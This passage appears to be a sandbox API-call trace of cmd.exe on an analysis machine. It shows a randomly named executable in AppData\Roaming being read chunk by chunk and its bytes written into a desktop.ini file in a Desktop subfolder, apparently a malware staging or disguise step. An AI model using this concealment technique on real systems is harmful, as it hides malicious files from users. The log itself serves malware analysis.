lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ce4f8*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0134.529] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0134.529] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0134.529] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0134.529] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\desktop.ini")) returned 0xffffffff [0134.529] GetLastError () 
returned 0x2 [0134.529] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1")) returned 0x10 [0134.529] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0134.529] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0134.529] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\desktop.ini")) returned 0xffffffff [0134.530] GetLastError () returned 0x2 [0134.530] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x2136a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2136a4) returned 0xffffffff [0134.530] GetLastError () returned 0x2 [0134.530] _get_osfhandle (_FileHandle=2) returned 0xb [0134.530] GetFileType (hFile=0xb) returned 0x2 [0134.530] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0134.530] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ceef8 | out: lpMode=0x1ceef8) returned 1 [0134.530] _get_osfhandle (_FileHandle=2) returned 0xb [0134.530] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1cef2c | out: lpConsoleScreenBufferInfo=0x1cef2c) returned 1 [0134.530] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0134.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.531] GetFileType (hFile=0x7) returned 0x2 [0134.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0134.531] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf61c | out: lpMode=0x1cf61c) returned 1 [0134.531] _dup (_FileHandle=1) returned 3 [0134.531] _close (_FileHandle=1) returned 0 
[0134.532] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini", _String2="con") returned -53 [0134.532] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cf5ec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0134.532] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0134.532] GetConsoleTitleW (in: lpConsoleTitle=0x1cf41c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.532] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x1cef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef80) returned 0x20e6a8 [0134.532] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0134.532] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0134.532] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0134.532] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1cde8c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0134.532] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 4 [0134.532] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.532] GetFileType (hFile=0x58) returned 0x1 [0134.532] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.533] GetFileSize (in: hFile=0x58, lpFileSizeHigh=0x1cdee4 | out: lpFileSizeHigh=0x1cdee4*=0x0) returned 0x7d600 [0134.533] _get_osfhandle (_FileHandle=4) returned 
0x58 [0134.533] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.533] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.533] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.534] GetFileType (hFile=0x50) returned 0x1 [0134.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.534] GetFileType (hFile=0x50) returned 0x1 [0134.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.534] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] GetFileType (hFile=0x50) returned 0x1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] GetFileType (hFile=0x50) returned 0x1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] GetFileType (hFile=0x50) returned 0x1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, 
lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] GetFileType (hFile=0x50) returned 0x1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] GetFileType (hFile=0x50) returned 0x1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] GetFileType (hFile=0x50) returned 0x1 [0134.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.535] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.535] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.535] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.536] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 
0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] GetFileType (hFile=0x50) returned 0x1 [0134.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.536] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.537] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.537] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) 
returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] GetFileType (hFile=0x50) returned 0x1 [0134.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.537] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0134.538] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.538] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] GetFileType (hFile=0x50) returned 0x1 [0134.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.538] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.539] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.539] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType 
(hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] GetFileType (hFile=0x50) returned 0x1 [0134.539] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.539] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceefc*, lpNumberOfBytesWritten=0x1cdf00*=0x20, lpOverlapped=0x0) returned 1 [0134.539] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.540] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1cdeec | out: lpNewFilePointer=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=4) returned 0x58 [0134.540] ReadFile (in: hFile=0x58, lpBuffer=0x1ced1c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1cdf0c, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesRead=0x1cdf0c*=0x200, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1ced1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced1c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1ced6c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ced6c*, 
lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1cedbc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cedbc*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1cee0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee0c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1cee5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1cee5c*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1ceeac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1cdf00, lpOverlapped=0x0 | out: lpBuffer=0x1ceeac*, lpNumberOfBytesWritten=0x1cdf00*=0x50, lpOverlapped=0x0) returned 1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] GetFileType (hFile=0x50) returned 0x1 [0134.540] _get_osfhandle (_FileHandle=1) returned 0x50 [0134.540] WriteFile (in: hFile=0x50, lpBuffer=0x1ceefc*, nNumberOfBytesToWrite=0x20, 